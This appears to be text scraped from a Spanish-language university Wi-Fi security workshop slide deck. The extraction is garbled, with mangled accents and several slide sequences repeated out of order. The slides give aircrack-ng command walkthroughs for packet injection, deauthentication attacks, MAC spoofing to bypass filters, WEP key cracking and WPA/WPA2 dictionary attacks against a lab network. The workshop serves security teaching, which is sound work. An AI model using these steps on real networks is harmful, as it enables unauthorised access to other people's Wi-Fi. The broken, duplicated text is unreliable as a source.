E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
